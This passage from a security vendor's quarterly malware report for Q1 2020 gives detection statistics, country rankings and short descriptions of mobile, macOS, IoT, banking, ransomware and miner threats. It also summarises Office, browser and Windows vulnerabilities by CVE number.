access to their bank card details. And, because the trojan remains on the device after stealing this data, the cybercriminals could intercept text messages containing two-factor authorization codes and use the stolen data without the victim's knowledge.\n\nAnother interesting find this quarter was [Cookiethief](<https://securelist.com/cookiethief/96332/>), a trojan designed to steal cookies from mobile browsers and the Facebook app. In the event of a successful attack, the malware provided its handler with access to the victim's account, including the ability to perform various actions in their name, such as liking, reposting, etc. To prevent the service from spotting any abnormal activity in the hijacked profile, the trojan contains a proxy module through which the attackers issue commands.\n\nThe third piece of malware that caught our attention this reporting quarter was trojan-Dropper.AndroidOS.Shopper.a. It is designed to [help cybercriminals to leave fake reviews and drive up ratings on Google Play](<https://securelist.com/smartphone-shopaholic/95544/>). The attackers' goals here are obvious: to increase the changes of their apps getting published and recommended, and to lull the vigilance of potential victims. Note that to rate apps and write reviews, the trojan uses Accessibility Services to gain full control over the other app: in this case, the official Google Play client.\n\n### Mobile threat statistics\n\nIn Q1 2020, Kaspersky's mobile products and technologies detected 1,152,662 malicious installation packages, or 171,669 more than in the previous quarter.\n\n_Number of malicious installation packages detected, Q1 2019 \u2013 Q1 2020 [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/13193928/sl_malware_report_01-kolichestvo-obnaruzhennyh-vredonosnyh-ustanovochnyh-paketov-q1-2019-q1-2019.png>)_\n\nStarting in Q2 2019, we have seen a steady rise in the number of mobile threats detected. Although it is too early to sound the alarm (2019 saw the lowest number of new threats in recent years), the trend is concerning.\n\n### Distribution of detected mobile apps by type\n\n_Distribution of newly detected mobile programs by type, Q1 2020 and Q4 2019 [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/13194010/sl_malware_report_02-en-mobile-behavior.png>)_\n\nOf all the threats detected in Q1, half were unwanted adware apps (49.9%), their share having increased by 19 p.p. compared to the previous quarter. Most often, we detected members of the HiddenAd and Ewind families, with a combined slice of 40% of all detected adware threats, as well as the FakeAdBlocker family (12%).\n\nPotentially unwanted RiskTool apps (28.24%) took second place; the share of this type of threat remained almost unchanged. The Smsreg (49% of all detected threats of this class), Agent (17%) and Dnotua (11%) families were the biggest contributors. Note that in Q1, the number of detected members of the Smsreg family increased by more than 50 percent.\n\nIn third place were Trojan-Dropper-type threats (9.72%). Although their share decreased by 7.63 p.p. against the previous quarter, droppers remain one of the most common classes of mobile threats. Ingopack emerged as Q1's leading family with a massive 71% of all Trojan-Dropper threats, followed by Waponor (12%) and [Hqwar](<https://securelist.com/hqwar-the-higher-it-flies-the-harder-it-drops/93689/>) (8%) far behind.\n\nIt is worth noting that mobile droppers are most often used for installing financial malware, although some financial threats can spread without their help. The share of these self-sufficient threats is quite substantial: in particular, the share of Trojan-Banker in Q1 increased by 2.1 p.p. to 3.65%.\n\n### Top 20 mobile malware programs\n\n_Note that this malware rankings do not include potentially dangerous or unwanted programs such as RiskTool or adware._\n\n| **Verdict ** | **%*** \n---|---|--- \n1 | DangerousObject.Multi.Generic | 44.89 \n2 | Trojan.AndroidOS.Boogr.gsh | 9.09 \n3 | DangerousObject.AndroidOS.GenericML | 7.08 \n4 | Trojan-Downloader.AndroidOS.Necro.d | 4.52 \n5 | Trojan.AndroidOS.Hiddapp.ch | 2.73 \n6 | Trojan-Downloader.AndroidOS.Helper.a | 2.45 \n7 | Trojan.AndroidOS.Handda.san | 2.31 \n8 | Trojan-Dropper.AndroidOS.Necro.z | 2.30 \n9 | Trojan.AndroidOS.Necro.a | 2.19 \n10 | Trojan-Downloader.AndroidOS.Necro.b | 1.94 \n11 | Trojan-Dropper.AndroidOS.Hqwar.gen | 1.82 \n12 | Trojan-Dropper.AndroidOS.Helper.l | 1.50 \n13 | Exploit.AndroidOS.Lotoor.be | 1.46 \n14 | Trojan-Dropper.AndroidOS.Lezok.p | 1.46 \n15 | Trojan-Banker.AndroidOS.Rotexy.e | 1.43 \n16 | Trojan-Dropper.AndroidOS.Penguin.e | 1.42 \n17 | Trojan-SMS.AndroidOS.Prizmes.a | 1.39 \n18 | Trojan.AndroidOS.Dvmap.a | 1.24 \n19 | Trojan.AndroidOS.Agent.rt | 1.21 \n20 | Trojan.AndroidOS.Vdloader.a | 1.18 \n \n_* Unique users attacked by this malware as a percentage of all users of Kaspersky mobile products that were attacked._\n\nFirst place in our Top 20 as ever went to DangerousObject.Multi.Generic (44.89%), the verdict we use for malware detected [using cloud technology](<https://www.kaspersky.com/enterprise-security/wiki-section/products/big-data-the-astraea-technology>). They are triggered when the antivirus databases still lack the data for detecting a malicious program, but the Kaspersky Security Network cloud already contains information about the object. This is basically how the latest malware is detected.\n\nSecond and third places were claimed by Trojan.AndroidOS.Boogr.gsh (9.09%) and DangerousObject.AndroidOS.GenericML (7,08%) respectively. These verdicts are assigned to files that are recognized as malicious by our [machine-learning systems](<https://www.kaspersky.com/enterprise-security/wiki-section/products/machine-learning-in-cybersecurity>).\n\nIn fourth (Trojan-Downloader.AndroidOS.Necro.d, 4.52%) and tenth (Trojan-Downloader.AndroidOS.Necro.b, 1.94%) places are members of the Necro family, whose main task is to download and install modules from cybercriminal servers. Eighth-placed Trojan-Dropper.AndroidOS.Necro.z (2.30%) acts in a similar way, extracting from itself only those modules that it needs. As for Trojan.AndroidOS.Necro.a, which took ninth place (2.19%), cybercriminals assigned it a different task: the trojan follows advertising links and clicks banner ads in the victim's name.\n\nTrojan.AndroidOS.Hiddapp.ch (2.73%) claimed fifth spot. As soon as it runs, the malware hides its icon on the list of apps and continues to operate in the background. The trojan's payload can be other trojan programs or adware apps.\n\nSixth place went to Trojan-Downloader.AndroidOS.Helper.a (2.45%), which is what Trojan-Downloader.AndroidOS.Necro usually delivers. Helper.a is tasked with downloading arbitrary code from the cybercriminals' server and running it.\n\nThe verdict Trojan.AndroidOS.Handda.san (2.31%) in seventh place is a group of diverse trojans that hide their icons, gain Device Admin rights on the device, and use packers to evade detection.\n\nTrojan-Banker.AndroidOS.Rotexy.e (1.43%) and Trojan-Dropper.AndroidOS.Penguin.e (1.42%) warrant a special mention. The former is the only banking trojan in the top 20 this past quarter. The Rotexy family is all of six years old, and its members have the functionality to steal bank card details and intercept two-factor payment authorization messages. In turn, the first member of the Penguin dropper family was only detected last July and had gained significant popularity by Q1 2020.\n\n### Geography of mobile threats\n\n \n\n_Map of infection attempts by mobile malware, Q1 2020 [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/13194110/sl_malware_report_03-en-mobile-all-map.png>)_\n\n**Top 10 countries by share of users attacked by mobile threats**\n\n| **Country*** | **%**** \n---|---|--- \n1 | Iran | 39.56 \n2 | Algeria | 21.44 \n3 | Bangladesh | 18.58 \n4 | Nigeria | 15.58 \n5 | Lebanon | 15.28 \n6 | Tunisia | 14.94 \n7 | Pakistan | 13.99 \n8 | Kuwait | 13.91 \n9 | Indonesia | 13.81 \n10 | Cuba | 13.62 \n \n_* Excluded from the rankings are countries with relatively few users of Kaspersky mobile products (under 10,000)._ \n_** Unique users attacked as a percentage of all users of Kaspersky mobile products in the country._\n\nIn Q1 2020, the leader by share of attacked users was Iran (39.56%). Inhabitants of this country most frequently encountered adware apps from the Notifyer family, as well as Telegram clone apps. In second place was Algeria (21.44%), where adware apps were also distributed, but this time it was the HiddenAd and FakeAdBlocker families. Third place was taken by Bangladesh (18.58%), where half of the top 10 mobile threats consisted of adware in the HiddenAd family.\n\n### Mobile banking trojans\n\nDuring the reporting period, we detected **42,115** installation packages of mobile banking trojans. This is the highest value in the past 18 months, and more than 2.5 times higher than in Q4 2019. The largest contributions to the statistics came from the Trojan-Banker.AndroidOS.Agent (42.79% of all installation packages detected), Trojan-Banker.AndroidOS.Wroba (16.61%), and Trojan-Banker.AndroidOS.Svpeng (13.66%) families.\n\n_Number of installation packages of mobile banking trojans detected by Kaspersky, Q1 2019 \u2013 Q1 2020 [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/13194342/sl_malware_report_04-kolichestvo-ustanovochnyh-paketov-mobilnyh-bankovskih-troyancev-q1-2019-q1-2019.png>)_\n\n**Top 10 mobile banking trojans**\n\n_ _ | **Verdict** | **%*** \n---|---|--- \n_1_ | Trojan-Banker.AndroidOS.Rotexy.e | 13.11 \n_2_ | Trojan-Banker.AndroidOS.Svpeng.q | 10.25 \n_3_ | Trojan-Banker.AndroidOS.Asacub.snt | 7.64 \n_4_ | Trojan-Banker.AndroidOS.Asacub.ce | 6.31 \n_5_ | Trojan-Banker.AndroidOS.Agent.eq | 5.70 \n_6_ | Trojan-Banker.AndroidOS.Anubis.san | 4.68 \n_7_ | Trojan-Banker.AndroidOS.Agent.ep | 3.65 \n_8_ | Trojan-Banker.AndroidOS.Asacub.a | 3.50 \n_9_ | Trojan-Banker.AndroidOS.Asacub.ar | 3.00 \n_10_ | Trojan-Banker.AndroidOS.Agent.cf | 2.70 \n \n_* Unique users attacked by this malware as a percentage of all users of Kaspersky mobile products who were attacked by banking threats._\n\nFirst and second places in our top 10 were claimed by trojans targeted at Russian-speaking mobile users: Trojan-Banker.AndroidOS.Rotexy.e (13.11%) and Trojan-Banker.AndroidOS.Svpeng.q (10.25%).\n\nThird, fourth, eighth, and ninth positions in the top 10 mobile banking threats went to members of the Asacub family. The cybercriminals behind this trojan stopped creating new samples, but its distribution channels were still active in Q1.\n\n_Geography of mobile banking threats, Q1 2020 [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/13194517/sl_malware_report_05-en-mobile-banker-map.png>)_\n\n**Top 10 countries by share of users attacked by mobile banking trojans**\n\n| Country* | %** \n---|---|--- \n1 | Japan | 0.57 \n2 | Spain | 0.48 \n3 | Italy | 0.26 \n4 | Bolivia | 0.18 \n5 | Russia | 0.17 \n6 | Turkey | 0.13 \n7 | Tajikistan | 0.13 \n8 | Brazil | 0.11 \n9 | Cuba | 0.11 \n10 | China | 0.10 \n \n_* Excluded from the rankings are countries with relatively few users of Kaspersky mobile products (under 10,000)._ \n_** Unique users attacked by mobile banking trojans as a percentage of all users of Kaspersky mobile products in the country._\n\nIn Q1 2020, Japan (0.57%) had the largest share of users attacked by mobile bankers; the vast majority of cases involved Trojan-Banker.AndroidOS.Agent.eq.\n\nIn second place came Spain (0.48%), where in more than half of all cases, we detected malware from the Trojan-Banker.AndroidOS.Cebruser family, and another quarter of detections were members of the Trojan-Banker.AndroidOS.Ginp family.\n\nThird place belonged to Italy (0.26%), where, as in Spain, the Trojan-Banker.AndroidOS.Cebruser family was the most widespread with almost two-thirds of detections.\n\nIt is worth saying a bit more about the Cebruser family. Its creators were among the first to exploit the coronavirus topic to spread the malware.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/13183112/sl_malware_report.png>)When it runs, the trojan immediately gets down to business: it requests access to Accessibility Services to obtain Device Admin permissions, and then tries to get hold of card details.\n\nThe malware is distributed under the [Malware-as-a-Service](<https://encyclopedia.kaspersky.com/glossary/malware-as-a-service-maas/?utm_source=securelist&utm_medium=blog&utm_campaign=termin-explanation>) model; its set of functions is standard for such threats, but with one interesting detail \u2014 the use of a step-counter for activation so as to bypass dynamic analysis tools ([sandbox](<https://encyclopedia.kaspersky.com/glossary/sandbox/?utm_source=securelist&utm_medium=blog&utm_campaign=termin-explanation>)). Cebruser targets the mobile apps of banks in various countries and popular non-financial apps; its main weapons are phishing windows and interception of two-factor authorization. In addition, the malware can block the screen using a ransomware tool and intercept keystrokes on the virtual keyboard.\n\n### Mobile ransomware trojans\n\nIn Q2 2020, we detected **4,339** installation packages of mobile trojan ransomware, 1,067 fewer than in the previous quarter.\n\n_Number of installation packages of mobile ransomware trojans detected by Kaspersky, Q1 2019 \u2013 Q1 2020 [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/13194615/sl_malware_report_06-kolichestvo-ustanovochnyh-paketov-mobilnyh-troyancev-vymogatelej-q1-2018-q1-2019.png>)_\n\n**Top 10 mobile ransomware trojans**\n\n| Verdict | %* \n---|---|--- \n1 | Trojan-Ransom.AndroidOS.Svpeng.aj | 17.08 \n2 | Trojan-Ransom.AndroidOS.Congur.e | 12.70 \n3 | Trojan-Ransom.AndroidOS.Small.as | 11.41 \n4 | Trojan-Ransom.AndroidOS.Rkor.k | 9.88 \n5 | Trojan-Ransom.AndroidOS.Small.as | 7.32 \n6 | Trojan-Ransom.AndroidOS.Small.o | 4.79 \n7 | Trojan-Ransom.AndroidOS.Svpeng.aj | 3.62 \n8 | Trojan-Ransom.AndroidOS.Svpeng.ah | 3.55 \n9 | Trojan-Ransom.AndroidOS.Congur.e | 3.32 \n10 | Trojan-Ransom.AndroidOS.Fusob.h | 3.17 \n \n_* Unique users attacked by this malware as a percentage of all users of Kaspersky mobile products who were attacked by ransomware trojans._\n\nOver the past few quarters, the number of ransomware trojans detected has been gradually decreasing; all the same, we continue to detect quite a few infection attempts by this class of threats. The main contributors to the statistics were the Svpeng, Congur, and Small ransomware families.\n\n_Geography of mobile ransomware trojans, Q1 2020 [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/13194659/sl_malware_report_07-en-mobile-ransom-map.png>)_\n\nTop 10 countries by share of users attacked by mobile ransomware trojans:\n\n| **Country*** | **%**** \n---|---|--- \n1 | USA | 0.26 \n2 | Kazakhstan | 0.25 \n3 | Iran | 0.16 \n4 | China | 0.09 \n5 | Saudi Arabia | 0.08 \n6 | Italy | 0.03 \n7 | Mexico | 0.03 \n8 | Canada | 0.03 \n9 | Indonesia | 0.03 \n10 | Switzerland | 0.03 \n \n_* Excluded from the rankings are countries with relatively few users of Kaspersky mobile products (under 10,000)._ \n_** Unique users attacked by mobile ransomware trojans as a percentage of all users of Kaspersky mobile products in the country._\n\nThe leaders by number of users attacked by mobile ransomware trojans are Syria (0.28%), the United States (0.26%) and Kazakhstan (0.25%)\n\n## Attacks on Apple macOS\n\nIn Q1 2020, we detected not only new versions of common threats, but one new backdoor family, whose first member was Backdoor.OSX.Capip.a. The malware's operating principle is simple: it calls the C&C for a shell script, which it then downloads and executes.\n\n### Top 20 threats to macOS\n\n| Verdict | %* \n---|---|--- \n1 | Trojan-Downloader.OSX.Shlayer.a | 19.27 \n2 | AdWare.OSX.Pirrit.j | 10.34 \n3 | AdWare.OSX.Cimpli.k | 6.69 \n4 | AdWare.OSX.Ketin.h | 6.27 \n5 | AdWare.OSX.Pirrit.aa | 5.75 \n6 | AdWare.OSX.Pirrit.o | 5.74 \n7 | AdWare.OSX.Pirrit.x | 5.18 \n8 | AdWare.OSX.Spc.a | 4.56 \n9 | AdWare.OSX.Cimpli.f | 4.25 \n10 | AdWare.OSX.Bnodlero.t | 4.08 \n11 | AdWare.OSX.Bnodlero.x | 3.74 \n12 | Hoax.OSX.SuperClean.gen | 3.71 \n13 | AdWare.OSX.Cimpli.h | 3.37 \n14 | AdWare.OSX.Pirrit.v | 3.30 \n15 | AdWare.OSX.Amc.c | 2.98 \n16 | AdWare.OSX.MacSearch.d | 2.85 \n17 | RiskTool.OSX.Spigot.a | 2.84 \n18 | AdWare.OSX.Pirrit.s | 2.80 \n19 | AdWare.OSX.Ketin.d | 2.76 \n20 | AdWare.OSX.Bnodlero.aq | 2.70 \n \n_* Unique users attacked by this malware as a percentage of all users of Kaspersky security solutions for macOS who were attacked_\n\nThe top 20 threats for macOS did not undergo any major changes in Q1 2020. The adware trojan Shlayer.a (19.27%) still tops the leaderboard, followed by objects that Shlayer itself loads into the infected system, in particular, numerous adware apps from the Pirrit family.\n\nInterestingly, the unwanted program Hoax.OSX.SuperClean.gen landed in 12th place on the list. Like other Hoax-type programs, it is distributed under the guise of a system cleanup app, and immediately after installation, scares the user with problems purportedly found in the system, such as gigabytes of trash on the hard drive.\n\n### Threat geography\n\n| **Country*** | **%**** \n---|---|--- \n1 | Spain | 7.14 \n2 | France | 6.94 \n3 | Italy | 5.94 \n4 | Canada | 5.58 \n5 | USA | 5.49 \n6 | Russia | 5.10 \n7 | India | 4.88 \n8 | Mexico | 4.78 \n9 | Brazil | 4.65 \n10 | Belgium | 4.65 \n \n_* Excluded from the rankings are countries with relatively few users of Kaspersky security solutions for macOS (under 5,000)_ \n_** Unique users who encountered macOS threats as a percentage of all users of Kaspersky security solutions for macOS in the country._\n\nThe leading countries, as in previous quarters, were Spain (7.14%), France (6.94%) and Italy (5.94%). The main contributors to the number of detections in these countries were the familiar Shlayer trojan and adware apps from the Pirrit family.\n\n## IoT attacks\n\n### IoT threat statistics\n\nIn Q1 2020, the share of IP addresses from which attempts were made to attack Kaspersky telnet traps increased significantly. Their share amounted to 81.1% of all IP addresses from which attacks were carried out, while SSH traps accounted for slightly less than 19%. \n \nSSH | 18.9% \nTelnet | 81.1% \n \n_Distribution of attacked services by number of unique IP addresses of devices that carried out attacks, Q1 2020_\n\nIt was a similar situation with control sessions: attackers often controlled infected traps via telnet. \n \nSSH | 39.62% \nTelnet | 60.38% \n \n_Distribution of cybercriminal working sessions with Kaspersky traps, Q1 2020_\n\n### Telnet-based attacks\n\n \n\n_Geography of device IP addresses where attacks at Kaspersky telnet traps originated, Q1 2020 [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/13194811/sl_malware_report_09-en-telnet-geo.png>)_\n\n**Top 10 countries by location of devices from which attacks were carried out on Kaspersky telnet traps.**\n\nCountry* | **%** \n---|--- \nChina | 13.04 \nEgypt | 11.65 \nBrazil | 11.33 \nVietnam | 7.38 \nTaiwan | 6.18 \nRussia | 4.38 \nIran | 3.96 \nIndia | 3.14 \nTurkey | 3.00 \nUSA | 2.57 \n \n_ _ \nFor several quarters in a row, the leading country by number of attacking bots has been China: in Q1 2020 its share stood at 13.04%. As before, it is followed by Egypt (11.65%) and Brazil (11.33%).\n\n### SSH-based attacks\n\n \n\n_Geography of device IP addresses where attacks at Kaspersky SSH traps originated, Q1 2020 [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/13194853/sl_malware_report_10-en-ssh-geo.png>)_\n\n**Top 10 countries by location of devices from which attacks were made on Kaspersky SSH traps.**\n\nCountry* | % \n---|--- \nChina | 14.87 \nVietnam | 11.58 \nUSA | 7.03 \nEgypt | 6.82 \nBrazil | 5.79 \nRussia | 4.66 \nIndia | 4.16 \nGermany | 3.64 \nThailand | 3.44 \nFrance | 2.83 \n \nIn Q1 2020, China (14.87%), Vietnam (11.58%) and the US (7.03%) made up the top three countries by number of unique IPs from which attacks on SSH traps originated.\n\n### Threats loaded into honeypots\n\n**Verdict** | %* \n---|--- \nTrojan-Downloader.Linux.NyaDrop.b | 64.35 \nBackdoor.Linux.Mirai.b | 16.75 \nBackdoor.Linux.Mirai.ba | 6.47 \nBackdoor.Linux.Gafgyt.a | 4.36 \nBackdoor.Linux.Gafgyt.bj | 1.30 \nTrojan-Downloader.Shell.Agent.p | 0.68 \nBackdoor.Linux.Mirai.c | 0.64 \nBackdoor.Linux.Hajime.b | 0.46 \nBackdoor.Linux.Mirai.h | 0.40 \nBackdoor.Linux.Gafgyt.av | 0.35 \n \n_* Share of malware type in the total amount of malware downloaded to IoT devices following a successful attack._\n\nIn Q1 2020, attackers most often downloaded the minimalistic trojan loader NyaDrop (64.35%), whose executable file does not exceed 500 KB. Threats from the Mirai family traditionally dominated: its members claimed four places in our top 10. These malicious programs will continue to rule the world of IoT threats for a long time to come, at least until the appearance of a more advanced (and publicly available) DDoS bot.\n\n## Financial threats\n\n### Financial threat statistics\n\nIn Q1 2020, Kaspersky solutions blocked attempts to launch one or several types of malware designed to steal money from bank accounts on the computers of 249,748 users.\n\n_Number of unique users attacked by financial malware, Q1 2020 [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/13194937/sl_malware_report_11-en-finance.png>)_\n\n**Attack geography**\n\nTo assess and compare the risk of being infected by banking trojans and ATM/POS malware in various countries, for each country we calculated the share of users of Kaspersky products that faced this threat during the reporting period out of all users of our products in that country.\n\n_Geography of banking malware attacks, Q1 2020 [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/13195018/sl_malware_report_12-en-finance-map.png>)_\n\n**Top 10 countries by share of attacked users**\n\n| **Country*** | **%**** \n---|---|--- \n1 | Uzbekistan | 10.5 \n2 | Tajikistan | 6.9 \n3 | Turkmenistan | 5.5 \n4 | Afghanistan | 5.1 \n5 | Yemen | 3.1 \n6 | Kazakhstan | 3.0 \n7 | Guatemala | 2.8 \n8 | Syria | 2.4 \n9 | Sudan | 2.1 \n10 | Kyrgyzstan | 2.1 \n \n_* Excluded are countries with relatively few Kaspersky product users (under 10,000)._ \n_** Unique users whose computers were targeted by financial malware as a percentage of all unique users of Kaspersky products in the country._\n\n**Top 10 banking malware families**\n\n| Name | Verdicts | %* \n---|---|---|--- \n1 | Emotet | Backdoor.Win32.Emotet | 21.3 | \n2 | Zbot | Trojan.Win32.Zbot | 20.8 | \n3 | CliptoShuffler | Trojan-Banker.Win32.CliptoShuffler | 17.2 | \n4 | RTM | Trojan-Banker.Win32.RTM | 12.3 | \n5 | Nimnul | Virus.Win32.Nimnul | 3.6 | \n6 | Trickster | Trojan.Win32.Trickster | 3.6 | \n7 | Neurevt | Trojan.Win32.Neurevt | 3.3 | \n8 | SpyEye | Trojan-Spy.Win32.SpyEye | 2.3 | \n9 | Danabot | Trojan-Banker.Win32.Danabot | 2.0 | \n10 | Nymaim | Trojan.Win32.Nymaim | 1.9 | \n \n_** Unique users attacked by this malware family as a __percentage of all users attacked by financial malware._\n\n## Ransomware programs\n\n### Quarterly highlights\n\nRansomware attacks on organizations, as well as on city and municipal networks, did not ease off. Given how lucrative they are for cybercriminals, there is no reason why this trend of several years should cease.\n\nMore and more ransomware is starting to supplement encryption with data theft. To date, this tactic has been adopted by distributors of ransomware families, including Maze, REvil/Sodinokibi, DoppelPaymer and JSWorm/Nemty/Nefilim. If the victim refuses to pay the ransom for decryption (because, say, the data was recovered from a backup copy), the attackers threaten to put the stolen confidential information in the public domain. Such threats are sometimes empty, but not always: the authors of several ransomware programs have set up websites that do indeed publish the data of victim organizations.\n\n### Number of new modifications\n\nIn Q1 2020, we detected five new ransomware families and 5,225 new modifications of these malware programs.\n\n_Number of new ransomware modifications detected, Q1 2019 \u2013 Q1 2020 [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/13195150/sl_malware_report_13-ransomware-novye-modifikacii.png>)_\n\n### Number of users attacked by ransomware trojans\n\nIn Q1 2020, Kaspersky products and technologies protected 178,922 users from ransomware attacks.\n\n_Number of unique users attacked by ransomware trojans, Q1 2020 [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/13195235/sl_malware_report_14-en-ransomware-atakovannye-polzovateli.png>)_\n\n### Attack geography\n\n \n\n_Geography of attacks by ransomware trojans, Q1 2020 [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/13201512/sl_malware_report_15-en-ransomware-map.png>)_\n\n**Top 10 countries attacked by ransomware trojans**\n\n| **Country*** | **%**** \n---|---|--- \n1 | Bangladesh | 6.64 \n2 | Uzbekistan | 1.98 \n3 | Mozambique | 1.77 \n4 | Ethiopia | 1.67 \n5 | Nepal | 1.34 \n6 | Afghanistan | 1.31 \n7 | Egypt | 1.21 \n8 | Ghana | 0.83 \n9 | Azerbaijan | 0.81 \n10 | Serbia | 0.74 \n \n_* Excluded are countries with relatively few Kaspersky users (under 50,000)._ \n_** Unique users whose computers were attacked by ransomware trojans as a percentage of all unique users of Kaspersky products in the country._\n\n### Top 10 most common families of ransomware trojans\n\n| **Name** | **Verdicts** | **%*** \n---|---|---|--- \n1 | WannaCry | Trojan-Ransom.Win32.Wanna | 19.03 | \n2 | (generic verdict) | Trojan-Ransom.Win32.Gen | 16.71 | \n3 | (generic verdict) | Trojan-Ransom.Win32.Phny | 16.22 | \n4 | GandCrab | Trojan-Ransom.Win32.GandCrypt | 7.73 | \n5 | Stop | Trojan-Ransom.Win32.Stop | 6.62 | \n6 | (generic verdict) | Trojan-Ransom.Win32.Encoder | 4.28 | \n7 | (generic verdict) | Trojan-Ransom.Win32.Crypren | 4.15 | \n8 | PolyRansom/VirLock | Virus.Win32.PolyRansom,\n\nTrojan-Ransom.Win32.PolyRansom | 2.96 | \n9 | Crysis/Dharma | Trojan-Ransom.Win32.Crusis | 2.02 | \n10 | (generic verdict) | Trojan-Ransom.Win32.Generic | 1.56 | \n| | | | | \n \n_* Unique Kaspersky users __attacked by the specified family of ransomware trojans as a percentage of all users attacked by ransomware trojans._\n\n## Miners\n\n### Number of new modifications\n\nIn Q1 2020, Kaspersky solutions detected 192,036 new miner modifications.\n\n_Number of new miner modifications, Q1 2020 [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/13201558/sl_malware_report_16-en-miner-kolichestvo-novyh-modifikacij.png>)_\n\n### Number of users attacked by miners\n\nIn Q1, we detected attacks using miners on the computers of 518,857 unique users of Kaspersky Lab products worldwide.\n\n_Number of unique users attacked by miners, Q1 2020 [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/13201637/sl_malware_report_17-en-miner-kolichestvo-polzovatelej-atakovannyh-majnerami.png>)_\n\n### Attack geography\n\n \n\n_Geography of miner attacks, Q1 2020 [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/13201719/sl_malware_report_18-en-miner-map.png>)_\n\n**Top 10 countries attacked by miners**\n\n| **Country*** | **%**** \n---|---|--- \n1 | Afghanistan | 6.72 \n2 | Ethiopia | 4.90 \n3 | Tanzania | 3.26 \n4 | Sri Lanka | 3.22 \n5 | Uzbekistan | 3.10 \n6 | Rwanda | 2.56 \n7 | Vietnam | 2.54 \n8 | Kazakhstan | 2.45 \n9 | Mozambique | 1.96 \n10 | Pakistan | 1.67 \n \n_* Excluded are countries with relatively few users of Kaspersky products (under 50,000)._ \n_** Unique users whose computers were attacked by miners as a percentage of all unique users of Kaspersky products in the country._\n\n## Vulnerable applications used by cybercriminals during cyberattacks\n\nWe already noted that Microsoft Office vulnerabilities are the most common ones. Q1 2020 was no exception: the share of exploits for these vulnerabilities grew to 74.83%. The most popular vulnerability in Microsoft Office was [CVE-2017-11882](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11882>), which is related to a stack overflow error in the Equation Editor component. Hard on its heels was [CVE-2017-8570](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8570>), which is used to embed a malicious script in an OLE object inside an Office document. Several other vulnerabilities, such as [CVE-2018-0802](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-0802>) and [CVE-2017-8759](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8759>), were also popular with attackers. In the absence of security updates for Microsoft Office, these vulnerabilities are successfully exploited and the user's system becomes infected.\n\nIn second place were exploits for vulnerabilities in Internet browsers (11.06%). In Q1, cybercriminals attacked a whole host of browsers, including Microsoft Internet Explorer, Google Chrome, and Mozilla Firefox. What's more, some of the vulnerabilities were used in APT attacks, such as [CVE-2020-0674](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0674>), which is associated with the incorrect handling of objects in memory in an outdated version of the JScript scripting engine in Internet Explorer, leading to code execution. Another example is the previously identified [CVE-2019-17026](<https://nvd.nist.gov/vuln/detail/CVE-2019-17026>), a data type mismatch vulnerability in Mozilla Firefox's JIT compiler, which also leads to remote code execution. In the event of a successful attack, both browser exploits cause a malware infection. The researchers also detected a targeted attack against Google Chrome exploiting the RCE vulnerability [CVE-2020-6418](<https://nvd.nist.gov/vuln/detail/CVE-2020-6418>) in the JavaScript engine; in addition, the dangerous RCE vulnerability [CVE-2020-0767](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0767>) was detected in a component of the ChakraCore scripting engine used by Microsoft Edge. Although modern browsers have their own protection mechanisms, cybercriminals are forever finding ways around them, very often using chains of exploits to do so. Therefore, it is vital to keep the operating system and software up to date at all times.\n\n_Distribution of exploits used in attacks by type of application attacked, Q1 2020 [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/13201812/sl_malware_report_19-vuln.png>)_\n\nThis quarter, a wide range of critical vulnerabilities were detected in operating systems and their components.\n\n * [CVE-2020-0601](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0601>) is a vulnerability that exploits an error in the core cryptographic library of Windows, in a certificate validation algorithm that uses elliptic curves. This vulnerability enables the use of fake certificates that the system recognizes as legitimate.\n * [CVE-2020-0729](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0729>) is a vulnerability in processing LNK files in Windows, which allows remote code execution if the user opens a malicious shortcut.\n * [CVE-2020-0688](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0688>) is the result of a default configuration error in Microsoft Exchange Server, whereby the same cryptographic keys are used to sign and encrypt serialized ASP.NET ViewState data, enabling attackers to execute their own code on the server side with system rights.\n\nVarious network attacks on system services and network protocols were as popular as ever with attackers. We continue to detect attempts at exploiting vulnerabilities in the SMB protocol using EternalBlue, EternalRomance and similar sets of exploits. In Q1 2020, the new vulnerability [CVE-2020-0796](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0796>) (SMBGhost) was detected in the SMBv3 network protocol, leading to remote code execution, in which regard the attacker does not even need to know the username/password combination (since the error occurs before the authentication stage); however, it is present only in Windows 10. In Remote Desktop Gateway there were found two critical vulnerabilities ([CVE-2020-0609](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0609>) and [CVE-2020-0610](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0610>)) enabling an unauthorized user to execute remote code in the 